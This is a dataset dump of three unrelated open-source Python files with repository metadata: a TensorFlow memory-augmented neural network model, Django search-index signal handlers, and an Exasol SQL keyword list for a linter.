[
"Apache-2.0"
] | 1
|
2018-12-26T18:59:32.000Z
|
2019-01-02T15:32:40.000Z
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
[
"Apache-2.0"
] | 8
|
2019-02-03T03:14:54.000Z
|
2020-07-17T22:33:41.000Z
|
# Copyright 2018 Jörg Franke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import tensorflow as tf
from tensorflow.contrib.rnn import MultiRNNCell
from tensorflow.python.ops import variable_scope as vs
from adnc.model.controller_units.controller import get_rnn_cell_list
from adnc.model.memory_units.memory_unit import get_memory_unit
from adnc.model.utils import HolisticMultiRNNCell
from adnc.model.utils import WordEmbedding
"""
The memory augmented neural network (MANN) model object contains the controller and the memory unit as well as the
loss function and connects everything.
"""
class MANN():
def __init__(self, config, analyse=False, reuse=False, name='mann', dtype=tf.float32):
"""
Args:
config: dict, configuration of the whole model
analyse: bool, is analyzer is used or not
reuse: bool, reuse model or not
"""
self.seed = config["seed"]
self.rng = np.random.RandomState(seed=self.seed)
self.dtype = dtype
self.analyse = analyse
self.input_size = config["input_size"]
self.output_size = config["output_size"]
self.batch_size = config["batch_size"]
self.input_embedding = config["input_embedding"]
self.architecture = config['architecture']
self.controller_config = config["controller_config"]
self.memory_unit_config = config["memory_unit_config"]
self.output_function = config["output_function"]
self.output_mask = config["output_mask"]
self.loss_function = config['loss_function']
self.reuse = reuse
self.name = name
self.mask = tf.placeholder(self.dtype, [None, self.batch_size], name='mask')
self.target = tf.placeholder(self.dtype, [None, self.batch_size, self.output_size], name='y')
if self.input_embedding:
word_idx_dict = self.input_embedding['word_idx_dict']
embedding_size = self.input_embedding['embedding_size']
if 'tmp_dir' in self.input_embedding:
tmp_dir = self.input_embedding['tmp_dir']
else:
tmp_dir = "data_tmp"
glove = WordEmbedding(embedding_size, word_idx_dict=word_idx_dict, initialization='glove', tmp_dir=tmp_dir)
self._data = tf.placeholder(tf.int64, [None, self.batch_size], name='x')
self.data = glove.embed(self._data)
else:
self.data = tf.placeholder(tf.float32, [None, self.batch_size, self.input_size], name='x')
if self.architecture in ['uni', 'unidirectional']:
unweighted_outputs, states = self.unidirectional(self.data, self.controller_config, self.memory_unit_config,
reuse=self.reuse)
elif self.architecture in ['bi', 'bidirectional']:
unweighted_outputs, states = self.bidirectional(self.data, self.controller_config, self.memory_unit_config,
reuse=self.reuse)
else:
raise UserWarning("Unknown architecture, use unidirectional or bidirectional")
if self.analyse:
with tf.device('/cpu:0'):
if self.architecture in ['uni', 'unidirectional']:
analyse_outputs, analyse_states = self.unidirectional(self.data, self.controller_config,
self.memory_unit_config, analyse=True,
reuse=True)
analyse_outputs, analyse_signals = analyse_outputs
self.analyse = (analyse_outputs, analyse_signals, analyse_states)
elif self.architecture in ['bi', 'bidirectional']:
analyse_outputs, analyse_states = self.bidirectional(self.data, self.controller_config,
self.memory_unit_config, analyse=True,
reuse=True)
analyse_outputs, analyse_signals = analyse_outputs
self.analyse = (analyse_outputs, analyse_signals, analyse_states)
self.unweighted_outputs = unweighted_outputs
self.prediction, self.outputs = self._output_layer(unweighted_outputs)
self.loss = self.get_loss(self.prediction)
def _output_layer(self, outputs):
"""
Calculates the weighted and activated output of the MANN model
Args:
outputs: TF tensor, concatenation of memory units output and controller output
Returns: TF tensor, predictions; TF tensor, unactivated predictions
"""
with tf.variable_scope("output_layer"):
output_size = outputs.get_shape()[-1].value
weights_concat = tf.get_variable("weights_concat", (output_size, self.output_size),
initializer=tf.contrib.layers.xavier_initializer(seed=self.seed),
collections=['mann', tf.GraphKeys.GLOBAL_VARIABLES], dtype=self.dtype)
bias_merge = tf.get_variable("bias_merge", (self.output_size,), initializer=tf.constant_initializer(0.),
collections=['mann', tf.GraphKeys.GLOBAL_VARIABLES], dtype=self.dtype)
output_flat = tf.reshape(outputs, [-1, output_size])
output_flat = tf.matmul(output_flat, weights_concat) + bias_merge
if self.output_function == 'softmax':
predictions_flat = tf.nn.softmax(output_flat)
elif self.output_function == 'tanh':
predictions_flat = tf.tanh(output_flat)
elif self.output_function == 'linear':
predictions_flat = output_flat
else:
raise UserWarning("Unknown output function, use softmax, tanh or linear")
predictions = tf.reshape(predictions_flat, [-1, self.batch_size, self.output_size])
weighted_outputs = tf.reshape(output_flat, [-1, self.batch_size, self.output_size])
return predictions, weighted_outputs
def get_loss(self, prediction):
"""
Args:
prediction: TF tensor, activated prediction of the model
Returns: TF scalar, loss of the current forward set
"""
if self.loss_function == 'cross_entropy':
if self.output_mask:
cost = tf.reduce_sum(
-1 * self.target * tf.log(tf.clip_by_value(prediction, 1e-12, 10.0)) - (1 - self.target) * tf.log(
tf.clip_by_value(1 - prediction, 1e-12, 10.0)), axis=2)
cost *= self.mask
loss = tf.reduce_sum(cost) / tf.reduce_sum(self.mask)
else:
loss = tf.reduce_mean(
-1 * self.target * tf.log(tf.clip_by_value(prediction, 1e-12, 10.0)) - (1 - self.target) * tf.log(
tf.clip_by_value(1 - prediction, 1e-12, 10.0)))
elif self.loss_function == 'mse':
clipped_prediction = tf.clip_by_value(prediction, 1e-12, 10.0)
mse = tf.square(self.target - clipped_prediction)
mse = tf.reduce_mean(mse, axis=2)
if self.output_mask:
cost = mse * self.mask
loss = tf.reduce_sum(cost) / tf.reduce_sum(self.mask)
else:
loss = tf.reduce_mean(mse)
else:
raise UserWarning("Unknown loss function, use cross_entropy or mse")
return loss
def unidirectional(self, inputs, controller_config, memory_unit_config, analyse=False, reuse=False):
"""
Connects unidirectional controller and memory unit and performs scan over sequence
Args:
inputs: TF tensor, input sequence
controller_config: dict, configuration of the controller
memory_unit_config: dict, configuration of the memory unit
analyse: bool, do analysis
reuse: bool, reuse
Returns: TF tensor, output sequence; TF tensor, hidden states
"""
with tf.variable_scope("controller"):
controller_list = get_rnn_cell_list(controller_config, name='controller', reuse=reuse, seed=self.seed,
dtype=self.dtype)
if controller_config['connect'] == 'sparse':
memory_input_size = controller_list[-1].output_size
mu_cell = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse,
reuse=reuse)
cell = MultiRNNCell(controller_list + [mu_cell])
else:
controller_cell = HolisticMultiRNNCell(controller_list)
memory_input_size = controller_cell.output_size
mu_cell = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse,
reuse=reuse)
cell = MultiRNNCell([controller_cell, mu_cell])
batch_size = inputs.get_shape()[1].value
cell_init_states = cell.zero_state(batch_size, dtype=self.dtype)
output_init = tf.zeros([batch_size, cell.output_size], dtype=self.dtype)
if analyse:
output_init = (output_init, mu_cell.analyse_state(batch_size, dtype=self.dtype))
init_states = (output_init, cell_init_states)
def step(pre_states, inputs):
pre_rnn_output, pre_rnn_states = pre_states
if analyse:
pre_rnn_output = pre_rnn_output[0]
controller_inputs = tf.concat([inputs, pre_rnn_output], axis=-1)
rnn_output, rnn_states = cell(controller_inputs, pre_rnn_states)
return (rnn_output, rnn_states)
outputs, states = tf.scan(step, inputs, initializer=init_states, parallel_iterations=32)
return outputs, states
def bidirectional(self, inputs, controller_config, memory_unit_config, analyse=False, reuse=False):
"""
Connects bidirectional controller and memory unit and performs scan over sequence
Args:
inputs: TF tensor, input sequence
controller_config: dict, configuration of the controller
memory_unit_config: dict, configuration of the memory unit
analyse: bool, do analysis
reuse: bool, reuse
Returns: TF tensor, output sequence; TF tensor, hidden states
"""
with tf.variable_scope("controller"):
list_fw = get_rnn_cell_list(controller_config, name='con_fw', reuse=reuse, seed=self.seed, dtype=self.dtype)
list_bw = get_rnn_cell_list(controller_config, name='con_bw', reuse=reuse, seed=self.seed, dtype=self.dtype)
if controller_config['connect'] == 'sparse':
cell_fw = MultiRNNCell(list_fw)
cell_bw = MultiRNNCell(list_bw)
else:
cell_fw = HolisticMultiRNNCell(list_fw)
cell_bw = HolisticMultiRNNCell(list_bw)
memory_input_size = cell_fw.output_size + cell_bw.output_size
cell_mu = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse, reuse=reuse)
with vs.variable_scope("bw") as bw_scope:
inputs_reverse = tf.reverse(inputs, axis=[0])
output_bw, output_state_bw = tf.nn.dynamic_rnn(cell=cell_bw, inputs=inputs_reverse, dtype=self.dtype,
parallel_iterations=32, time_major=True, scope=bw_scope)
output_bw = tf.reverse(output_bw, axis=[0])
batch_size = inputs.get_shape()[1].value
cell_fw_init_states = cell_fw.zero_state(batch_size, dtype=self.dtype)
cell_mu_init_states = cell_mu.zero_state(batch_size, dtype=self.dtype)
output_init = tf.zeros([batch_size, cell_mu.output_size], dtype=self.dtype)
if analyse:
output_init = (output_init, cell_mu.analyse_state(batch_size, dtype=self.dtype))
init_states = (output_init, cell_fw_init_states, cell_mu_init_states)
coupled_inputs = (inputs, output_bw)
with vs.variable_scope("fw") as fw_scope:
def step(pre_states, coupled_inputs):
inputs, output_bw = coupled_inputs
pre_outputs, pre_states_fw, pre_states_mu = pre_states
if analyse:
pre_outputs = pre_outputs[0]
controller_inputs = tf.concat([inputs, pre_outputs], axis=-1)
output_fw, states_fw = cell_fw(controller_inputs, pre_states_fw)
mu_inputs = tf.concat([output_fw, output_bw], axis=-1)
output_mu, states_mu = cell_mu(mu_inputs, pre_states_mu)
return (output_mu, states_fw, states_mu)
outputs, states_fw, states_mu = tf.scan(step, coupled_inputs, initializer=init_states,
parallel_iterations=32)
states = states_fw, states_mu
return outputs, states
@property
def feed(self):
"""
Returns: TF placeholder for data, target and mask inout to the model
"""
return self.data, self.target, self.mask
@property
def controller_trainable_variables(self):
return tf.get_collection('recurrent_unit')
@property
def memory_unit_trainable_variables(self):
return tf.get_collection('memory_unit')
@property
def mann_trainable_variables(self):
return tf.get_collection('mann')
@property
def trainable_variables(self):
return tf.trainable_variables()
@property
def controller_parameter_amount(self):
return self.count_parameter_amount(self.controller_trainable_variables)
@property
def memory_unit_parameter_amount(self):
return self.count_parameter_amount(self.memory_unit_trainable_variables)
@property
def mann_parameter_amount(self):
return self.count_parameter_amount(self.mann_trainable_variables)
@staticmethod
def count_parameter_amount(var_list):
parameters = 0
for variable in var_list:
shape = variable.get_shape()
variable_parametes = 1
for dim in shape:
variable_parametes *= dim.value
parameters += variable_parametes
return parameters
@property
def parameter_amount(self):
var_list = tf.trainable_variables()
return self.count_parameter_amount(var_list)
| 44.651163
| 120
| 0.618685
|
c4f6ab7acce5ccebaffba5ca96bedf61f289e3f8
| 1,033
|
py
|
Python
|
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | 1
|
2020-12-14T09:51:32.000Z
|
2020-12-14T09:51:32.000Z
|
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | null | null | null |
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db.models.signals import post_save, m2m_changed, post_delete
from kitsune.search.v2.es7_utils import (
index_object,
delete_object,
remove_from_field,
)
from kitsune.search.v2.decorators import search_receiver
from kitsune.wiki.models import Document
from kitsune.products.models import Product, Topic
@search_receiver(post_save, Document)
@search_receiver(m2m_changed, Document.products.through)
@search_receiver(m2m_changed, Document.topics.through)
def handle_document_save(instance, **kwargs):
index_object.delay("WikiDocument", instance.pk)
@search_receiver(post_delete, Document)
def handle_document_delete(instance, **kwargs):
delete_object.delay("WikiDocument", instance.pk)
@search_receiver(post_delete, Product)
def handle_product_delete(instance, **kwargs):
remove_from_field.delay("WikiDocument", "product_ids", instance.pk)
@search_receiver(post_delete, Topic)
def handle_topic_delete(instance, **kwargs):
remove_from_field.delay("WikiDocument", "topic_ids", instance.pk)
| 32.28125
| 72
| 0.802517
|
0b66da63babd20bf57e7991cebcff1e6e75a2ddc
| 13,958
|
py
|
Python
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 2
|
2021-08-04T08:58:33.000Z
|
2021-08-04T18:54:06.000Z
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 1
|
2020-04-02T09:05:39.000Z
|
2020-12-10T14:42:59.000Z
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 1
|
2021-07-03T12:56:56.000Z
|
2021-07-03T12:56:56.000Z
|
"""A list of all SQL key words."""
RESERVED_KEYWORDS = [
"ABSOLUTE",
"ACTION",
"ADD",
"AFTER",
"ALL",
"ALLOCATE",
"ALTER",
"AND",
"ANY",
"APPEND",
"ARE",
"ARRAY",
"AS",
"ASC",
"ASENSITIVE",
"ASSERTION",
"AT",
"ATTRIBUTE",
"AUTHID",
"AUTHORIZATION",
"BEFORE",
"BEGIN",
"BETWEEN",
"BIGINT",
"BINARY",
"BIT",
"BLOB",
"BLOCKED",
"BOOL",
"BOOLEAN",
"BOTH",
"BY",
"BYTE",
"CALL",
"CALLED",
"CARDINALITY",
"CASCADE",
"CASCADED",
"CASE",
"CASESPECIFIC",
"CAST",
"CATALOG",
"CHAIN",
"CHAR",
"CHARACTER",
"CHARACTERISTICS",
"CHARACTER_SET_CATALOG",
"CHARACTER_SET_NAME",
"CHARACTER_SET_SCHEMA",
"CHECK",
"CHECKED",
"CLOB",
"CLOSE",
"COALESCE",
"COLLATE",
"COLLATION",
"COLLATION_CATALOG",
"COLLATION_NAME",
"COLLATION_SCHEMA",
"COLUMN",
"COMMIT",
"CONDITION",
"CONNECTION",
"CONNECT_BY_ISCYCLE",
"CONNECT_BY_ISLEAF",
"CONNECT_BY_ROOT",
"CONSTANT",
"CONSTRAINT",
"CONSTRAINTS",
"CONSTRAINT_STATE_DEFAULT",
"CONSTRUCTOR",
"CONTAINS",
"CONTINUE",
"CONTROL",
"CONVERT",
"CORRESPONDING",
"CREATE",
"CS",
"CSV",
"CUBE",
"CURRENT",
"CURRENT_DATE",
"CURRENT_PATH",
"CURRENT_ROLE",
"CURRENT_SCHEMA",
"CURRENT_SESSION",
"CURRENT_STATEMENT",
"CURRENT_TIME",
"CURRENT_TIMESTAMP",
"CURRENT_USER",
"CURSOR",
"CYCLE",
"DATA",
"DATALINK",
"DATE",
"DATETIME_INTERVAL_CODE",
"DATETIME_INTERVAL_PRECISION",
"DAY",
"DBTIMEZONE",
"DEALLOCATE",
"DEC",
"DECIMAL",
"DECLARE",
"DEFAULT",
"DEFAULT_LIKE_ESCAPE_CHARACTER",
"DEFERRABLE",
"DEFERRED",
"DEFINED",
"DEFINER",
"DELETE",
"DEREF",
"DERIVED",
"DESC",
"DESCRIBE",
"DESCRIPTOR",
"DETERMINISTIC",
"DISABLE",
"DISABLED",
"DISCONNECT",
"DISPATCH",
"DISTINCT",
"DLURLCOMPLETE",
"DLURLPATH",
"DLURLPATHONLY",
"DLURLSCHEME",
"DLURLSERVER",
"DLVALUE",
"DO",
"DOMAIN",
"DOUBLE",
"DROP",
"DYNAMIC",
"DYNAMIC_FUNCTION",
"DYNAMIC_FUNCTION_CODE",
"EACH",
"ELSE",
"ELSEIF",
"ELSIF",
"EMITS",
"ENABLE",
"ENABLED",
"END",
"END-EXEC",
"ENDIF",
"ENFORCE",
"EQUALS",
"ERRORS",
"ESCAPE",
"EXCEPT",
"EXCEPTION",
"EXEC",
"EXECUTE",
"EXISTS",
"EXIT",
"EXPORT",
"EXTERNAL",
"EXTRACT",
"FALSE",
"FBV",
"FETCH",
"FILE",
"FINAL",
"FIRST",
"FLOAT",
"FOLLOWING",
"FOR",
"FORALL",
"FORCE",
"FORMAT",
"FOUND",
"FREE",
"FROM",
"FS",
"FULL",
"FUNCTION",
"GENERAL",
"GENERATED",
"GEOMETRY",
"GET",
"GLOBAL",
"GO",
"GOTO",
"GRANT",
"GRANTED",
"GROUP",
"GROUPING",
"GROUPS",
"GROUP_CONCAT",
"HASHTYPE",
"HASHTYPE_FORMAT",
"HAVING",
"HIGH",
"HOLD",
"HOUR",
"IDENTITY",
"IF",
"IFNULL",
"IMMEDIATE",
"IMPERSONATE",
"IMPLEMENTATION",
"IMPORT",
"IN",
"INDEX",
"INDICATOR",
"INNER",
"INOUT",
"INPUT",
"INSENSITIVE",
"INSERT",
"INSTANCE",
"INSTANTIABLE",
"INT",
"INTEGER",
"INTEGRITY",
"INTERSECT",
"INTERVAL",
"INTO",
"INVERSE",
"INVOKER",
"IS",
"ITERATE",
"JOIN",
"KEY_MEMBER",
"KEY_TYPE",
"LARGE",
"LAST",
"LATERAL",
"LDAP",
"LEADING",
"LEAVE",
"LEFT",
"LEVEL",
"LIKE",
"LIMIT",
"LISTAGG",
"LOCAL",
"LOCALTIME",
"LOCALTIMESTAMP",
"LOCATOR",
"LOG",
"LONGVARCHAR",
"LOOP",
"LOW",
"MAP",
"MATCH",
"MATCHED",
"MERGE",
"METHOD",
"MINUS",
"MINUTE",
"MOD",
"MODIFIES",
"MODIFY",
"MODULE",
"MONTH",
"NAMES",
"NATIONAL",
"NATURAL",
"NCHAR",
"NCLOB",
"NEW",
"NEXT",
"NLS_DATE_FORMAT",
"NLS_DATE_LANGUAGE",
"NLS_FIRST_DAY_OF_WEEK",
"NLS_NUMERIC_CHARACTERS",
"NLS_TIMESTAMP_FORMAT",
"NO",
"NOCYCLE",
"NOLOGGING",
"NONE",
"NOT",
"NULL",
"NULLIF",
"NUMBER",
"NUMERIC",
"NVARCHAR",
"NVARCHAR2",
"OBJECT",
"OF",
"OFF",
"OLD",
"ON",
"ONLY",
"OPEN",
"OPTION",
"OPTIONS",
"OR",
"ORDER",
"ORDERING",
"ORDINALITY",
"OTHERS",
"OUT",
"OUTER",
"OUTPUT",
"OVER",
"OVERLAPS",
"OVERLAY",
"OVERRIDING",
"PAD",
"PARALLEL_ENABLE",
"PARAMETER",
"PARAMETER_SPECIFIC_CATALOG",
"PARAMETER_SPECIFIC_NAME",
"PARAMETER_SPECIFIC_SCHEMA",
"PARTIAL",
"PATH",
"PERMISSION",
"PLACING",
"PLUS",
"POSITION",
"PRECEDING",
"PREFERRING",
"PREPARE",
"PRESERVE",
"PRIOR",
"PRIVILEGES",
"PROCEDURE",
"PROFILE",
"QUALIFY",
"RANDOM",
"RANGE",
"READ",
"READS",
"REAL",
"RECOVERY",
"RECURSIVE",
"REF",
"REFERENCES",
"REFERENCING",
"REFRESH",
"REGEXP_LIKE",
"RELATIVE",
"RELEASE",
"RENAME",
"REPEAT",
"REPLACE",
"RESTORE",
"RESTRICT",
"RESULT",
"RETURN",
"RETURNED_LENGTH",
"RETURNED_OCTET_LENGTH",
"RETURNS",
"REVOKE",
"RIGHT",
"ROLLBACK",
"ROLLUP",
"ROUTINE",
"ROW",
"ROWS",
"ROWTYPE",
"SAVEPOINT",
"SCHEMA",
"SCOPE",
"SCOPE_USER",
"SCRIPT",
"SCROLL",
"SEARCH",
"SECOND",
"SECTION",
"SECURITY",
"SELECT",
"SELECTIVE",
"SELF",
"SENSITIVE",
"SEPARATOR",
"SEQUENCE",
"SESSION",
"SESSIONTIMEZONE",
"SESSION_USER",
"SET",
"SETS",
"SHORTINT",
"SIMILAR",
"SMALLINT",
"SOME",
"SOURCE",
"SPACE",
"SPECIFIC",
"SPECIFICTYPE",
"SQL",
"SQLEXCEPTION",
"SQLSTATE",
"SQLWARNING",
"SQL_BIGINT",
"SQL_BIT",
"SQL_CHAR",
"SQL_DATE",
"SQL_DECIMAL",
"SQL_DOUBLE",
"SQL_FLOAT",
"SQL_INTEGER",
"SQL_LONGVARCHAR",
"SQL_NUMERIC",
"SQL_PREPROCESSOR_SCRIPT",
"SQL_REAL",
"SQL_SMALLINT",
"SQL_TIMESTAMP",
"SQL_TINYINT",
"SQL_TYPE_DATE",
"SQL_TYPE_TIMESTAMP",
"SQL_VARCHAR",
"START",
"STATE",
"STATEMENT",
"STATIC",
"STRUCTURE",
"STYLE",
"SUBSTRING",
"SUBTYPE",
"SYSDATE",
"SYSTEM",
"SYSTEM_USER",
"SYSTIMESTAMP",
"TABLE",
"TEMPORARY",
"TEXT",
"THEN",
"TIME",
"TIMESTAMP",
"TIMEZONE_HOUR",
"TIMEZONE_MINUTE",
"TINYINT",
"TO",
"TRAILING",
"TRANSACTION",
"TRANSFORM",
"TRANSFORMS",
"TRANSLATION",
"TREAT",
"TRIGGER",
"TRIM",
"TRUE",
"TRUNCATE",
"UNDER",
"UNION",
"UNIQUE",
"UNKNOWN",
"UNLINK",
"UNNEST",
"UNTIL",
"UPDATE",
"USAGE",
"USER",
"USING",
"VALUE",
"VALUES",
"VARCHAR",
"VARCHAR2",
"VARRAY",
"VERIFY",
"VIEW",
"WHEN",
"WHENEVER",
"WHERE",
"WHILE",
"WINDOW",
"WITH",
"WITHIN",
"WITHOUT",
"WORK",
"YEAR",
"YES",
"ZONE",
]
UNRESERVED_KEYWORDS = [
"ABS",
"ACCESS",
"ACOS",
"ADAPTER",
"ADD_DAYS",
"ADD_HOURS",
"ADD_MINUTES",
"ADD_MONTHS",
"ADD_SECONDS",
"ADD_WEEKS",
"ADD_YEARS",
"ADMIN",
"ALIGN",
"ALWAYS",
"ANALYZE",
"ANSI",
"APPROXIMATE_COUNT_DISTINCT",
"ASCII",
"ASIN",
"ASSIGNMENT",
"ASYMMETRIC",
"ATAN",
"ATAN2",
"ATOMIC",
"ATTEMPTS",
"AUDIT",
"AUTHENTICATED",
"AUTO",
"AVG",
"BACKUP",
"BERNOULLI",
"BIT_AND",
"BIT_CHECK",
"BIT_LENGTH",
"BIT_LROTATE",
"BIT_LSHIFT",
"BIT_NOT",
"BIT_OR",
"BIT_RROTATE",
"BIT_RSHIFT",
"BIT_SET",
"BIT_TO_NUM",
"BIT_XOR",
"BREADTH",
"CEIL",
"CEILING",
"CHANGE",
"CHARACTERS",
"CHARACTER_LENGTH",
"CHR",
"CLEAR",
"COBOL",
"COLOGNE_PHONETIC",
"COMMENT",
"COMMENTS",
"COMMITTED",
"CONCAT",
"CONNECT",
"CONVERT_TZ",
"CORR",
"COS",
"COSH",
"COT",
"COUNT",
"COVAR_POP",
"COVAR_SAMP",
"CREATED",
"CROSS",
"CURDATE",
"DATABASE",
"DATE_TRUNC",
"DAYS_BETWEEN",
"DEBUG",
"DECODE",
"DEFAULTS",
"DEFAULT_CONSUMER_GROUP",
"DEGREES",
"DELIMIT",
"DELIMITER",
"DENSE_RANK",
"DEPTH",
"DIAGNOSTICS",
"DICTIONARY",
"DISTRIBUTE",
"DISTRIBUTION",
"DIV",
"DOWN",
"DUMP",
"EDIT_DISTANCE",
"EMPTY",
"ENCODING",
"ERROR",
"ESTIMATE",
"EVALUATE",
"EVERY",
"EXA",
"EXCLUDE",
"EXCLUDING",
"EXP",
"EXPERIMENTAL",
"EXPIRE",
"EXPLAIN",
"EXPRESSION",
"FAILED",
"FILES",
"FIRST_VALUE",
"FLOOR",
"FLUSH",
"FOREIGN",
"FORTRAN",
"FROM_POSIX_TIME",
"GREATEST",
"GROUPING_ID",
"HANDLER",
"HAS",
"HASH",
"HASHTYPE_MD5",
"HASHTYPE_SHA",
"HASHTYPE_SHA1",
"HASHTYPE_SHA256",
"HASHTYPE_SHA512",
"HASHTYPE_TIGER",
"HASH_MD5",
"HASH_SHA",
"HASH_SHA1",
"HASH_SHA256",
"HASH_SHA512",
"HASH_TIGER",
"HIERARCHY",
"HOURS_BETWEEN",
"IDENTIFIED",
"IGNORE",
"IMPERSONATION",
"INCLUDING",
"INITCAP",
"INITIALLY",
"INSTR",
"INVALID",
"IPROC",
"ISOLATION",
"IS_BOOLEAN",
"IS_DATE",
"IS_DSINTERVAL",
"IS_NUMBER",
"IS_TIMESTAMP",
"IS_YMINTERVAL",
"JAVA",
"JAVASCRIPT",
"JSON",
"JSON_EXTRACT",
"JSON_VALUE",
"KEEP",
"KERBEROS",
"KEY",
"KEYS",
"KILL",
"LAG",
"LANGUAGE",
"LAST_VALUE",
"LCASE",
"LEAD",
"LEAST",
"LENGTH",
"LINK",
"LN",
"LOCATE",
"LOCK",
"LOG10",
"LOG2",
"LOGIN",
"LOGS",
"LONG",
"LOWER",
"LPAD",
"LTRIM",
"LUA",
"MANAGE",
"MAX",
"MAXIMAL",
"MEDIAN",
"MESSAGE",
"MID",
"MIN",
"MINUTES_BETWEEN",
"MONTHS_BETWEEN",
"MUL",
"MULTIPLE",
"MUMPS",
"NEVER",
"NICE",
"NORMALIZED",
"NOTICE",
"NOW",
"NPROC",
"NULLIFZERO",
"NULLS",
"NUMTODSINTERVAL",
"NUMTOYMINTERVAL",
"NVL",
"NVL2",
"OBJECTS",
"OCTETS",
"OCTET_LENGTH",
"OFFSET",
"OPTIMIZE",
"OPTIMIZER",
"ORA",
"OVERFLOW",
"OWNER",
"PADDING",
"PARTITION",
"PASCAL",
"PASSWORD",
"PASSWORD_EXPIRY_POLICY",
"PASSWORD_SECURITY_POLICY",
"PERCENTILE_CONT",
"PERCENTILE_DISC",
"PI",
"PLI",
"POSIX_TIME",
"POWER",
"PRECISION",
"PRELOAD",
"PRIMARY",
"PRINCIPAL",
"PRIVILEGE",
"PYTHON",
"QUERY_CACHE",
"QUERY_TIMEOUT",
"QUIET",
"R",
"RADIANS",
"RAND",
"RANK",
"RATIO_TO_REPORT",
"RAW_SIZE_LIMIT",
"RECOMPRESS",
"RECORD",
"REGEXP_INSTR",
"REGEXP_REPLACE",
"REGEXP_SUBSTR",
"REGR_AVGX",
"REGR_AVGY",
"REGR_COUNT",
"REGR_INTERCEPT",
"REGR_R2",
"REGR_SLOPE",
"REGR_SXX",
"REGR_SXY",
"REGR_SYY",
"REJECT",
"REORGANIZE",
"REPEATABLE",
"RESET",
"RESPECT",
"RETURNING",
"REVERSE",
"ROLE",
"ROLES",
"ROUND",
"ROWID",
"ROW_NUMBER",
"RPAD",
"RTRIM",
"SCALAR",
"SCHEMAS",
"SCHEME",
"SCRIPT_LANGUAGES",
"SCRIPT_OUTPUT_ADDRESS",
"SECONDS_BETWEEN",
"SECURE",
"SERIALIZABLE",
"SESSION_PARAMETER",
"SESSION_TEMP_DB_RAM_LIMIT",
"SHUT",
"SIGN",
"SIMPLE",
"SIN",
"SINH",
"SIZE",
"SKIP",
"SOUNDEX",
"SQRT",
"STATISTICS",
"STDDEV",
"STDDEV_POP",
"STDDEV_SAMP",
"ST_AREA",
"ST_BOUNDARY",
"ST_BUFFER",
"ST_CENTROID",
"ST_CONTAINS",
"ST_CONVEXHULL",
"ST_CROSSES",
"ST_DIFFERENCE",
"ST_DIMENSION",
"ST_DISJOINT",
"ST_DISTANCE",
"ST_ENDPOINT",
"ST_ENVELOPE",
"ST_EQUALS",
"ST_EXTERIORRING",
"ST_FORCE2D",
"ST_GEOMETRYN",
"ST_GEOMETRYTYPE",
"ST_INTERIORRINGN",
"ST_INTERSECTION",
"ST_INTERSECTS",
"ST_ISCLOSED",
"ST_ISEMPTY",
"ST_ISRING",
"ST_ISSIMPLE",
"ST_LENGTH",
"ST_MAX_DECIMAL_DIGITS",
"ST_NUMGEOMETRIES",
"ST_NUMINTERIORRINGS",
"ST_NUMPOINTS",
"ST_OVERLAPS",
"ST_POINTN",
"ST_SETSRID",
"ST_STARTPOINT",
"ST_SYMDIFFERENCE",
"ST_TOUCHES",
"ST_TRANSFORM",
"ST_UNION",
"ST_WITHIN",
"ST_X",
"ST_Y",
"SUBSTR",
"SUM",
"SYMMETRIC",
"SYS_CONNECT_BY_PATH",
"SYS_GUID",
"TABLES",
"TABLESAMPLE",
"TAN",
"TANH",
"TASKS",
"TEMP_DB_RAM_LIMIT",
"TIES",
"TIMESTAMP_ARITHMETIC_BEHAVIOR",
"TIME_ZONE",
"TIME_ZONE_BEHAVIOR",
"TO_CHAR",
"TO_DATE",
"TO_DSINTERVAL",
"TO_NUMBER",
"TO_TIMESTAMP",
"TO_YMINTERVAL",
"TRACE",
"TRANSLATE",
"TRUNC",
"TYPE",
"UCASE",
"UNBOUNDED",
"UNCOMMITTED",
"UNDO",
"UNICODE",
"UNICODECHR",
"UNLIMITED",
"UPPER",
"USE",
"USER_TEMP_DB_RAM_LIMIT",
"UTF8",
"VALUE2PROC",
"VARIANCE",
"VARYING",
"VAR_POP",
"VAR_SAMP",
"VIRTUAL",
"WEEK",
"WRITE",
"YEARS_BETWEEN",
"ZEROIFNULL",
# Additional unreserved keywords not defined in EXA_SQL_KEYWORDS
"JDBC",
"DRIVER",
"CONSUMER",
]
BARE_FUNCTIONS = [
"CURRENT_TIMESTAMP",
"SYSTIMESTAMP",
"NOW",
"LOCALTIMESTAMP",
"CURDATE",
"CURRENT_DATE",
"SYSDATE",
"CURRENT_USER",
"USER",
"CURRENT_SESSION",
"SESSIONTIMEZONE",
"DBTIMEZONE",
"CURRENT_SCHEMA",
"CURRENT_STATEMENT",
"ROWID",
"ROWNUM",
"LEVEL",
"CONNECT_BY_ISLEAF",
"CONNECT_BY_ROOT",
"CONNECT_BY_ISCYCLE",
]
| 15.970252
| 68
| 0.502221
|
c7ed458a812f289003ac710bd37482747e3b2ae9
| 1,001
|
py
|
Python
|
main.py
|
guard-project/lcp
|
